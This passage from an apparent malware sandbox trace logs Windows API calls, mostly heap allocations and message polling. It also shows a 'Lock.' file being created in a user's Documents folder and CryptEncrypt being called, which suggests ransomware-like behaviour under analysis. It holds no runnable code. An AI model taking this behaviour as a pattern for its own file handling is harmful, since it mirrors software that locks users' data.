lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0263.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0263.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0263.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0263.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0263.111] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/Lock.Kji1x-v4FT0kOOxbY6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lock.kji1x-v4ft0kooxby6"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0263.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0263.112] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.112] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.112] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0263.112] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0263.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0263.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0263.112] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0263.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0263.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0263.112] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0263.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0263.113] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0263.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0263.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0263.113] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0263.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0263.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0263.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0263.113] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0263.113] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0263.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0263.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0263.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0263.113] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0263.113] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.113] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0263.113] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.113] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0263.114] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0263.114] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0263.114] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0263.114] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0263.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0263.114] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0263.114] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0263.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.114] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.114] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0263.114] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.115] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0263.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0263.115] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0263.115] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0263.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0263.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0263.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0263.115] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0263.115] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0263.115] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0263.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0263.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0263.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0263.115] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.115] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0263.115] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0263.115] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0263.115] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0263.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0263.116] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0263.116] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.116] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0263.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0263.116] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0263.116] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0263.116] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.116] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0263.117] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0263.117] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.117] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0263.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0263.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0263.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0263.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0263.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0263.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0263.117] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0263.117] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0263.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0263.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.117] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0263.117] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0263.118] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.118] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0263.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0263.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0263.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0263.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0263.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0263.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0263.118] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0263.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0263.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0263.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0263.118] CryptEncrypt (in: hKey=0xaa5920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0263.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0263.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0263.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0263.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0263.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0263.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0263.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0263.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0263.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0263.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0263.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0263.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0263.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0263.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0263.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0263.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0263.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0263.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0263.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0263.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0263.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0263.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0263.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0263.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0263.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0263.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0263.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0263.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0263.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0263.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0263.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0263.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0263.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0263.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0263.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0263.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0263.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0263.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0263.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0263.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0263.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0263.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0263.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0263.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0263.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0263.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0263.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0263.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0263.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0263.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0263.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0263.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0263.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0263.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0263.121] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0263.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0263.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0263.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0263.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0263.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0263.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0263.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0263.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0263.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0263.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0263.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0263.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0263.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0263.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0263.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0263.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0263.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 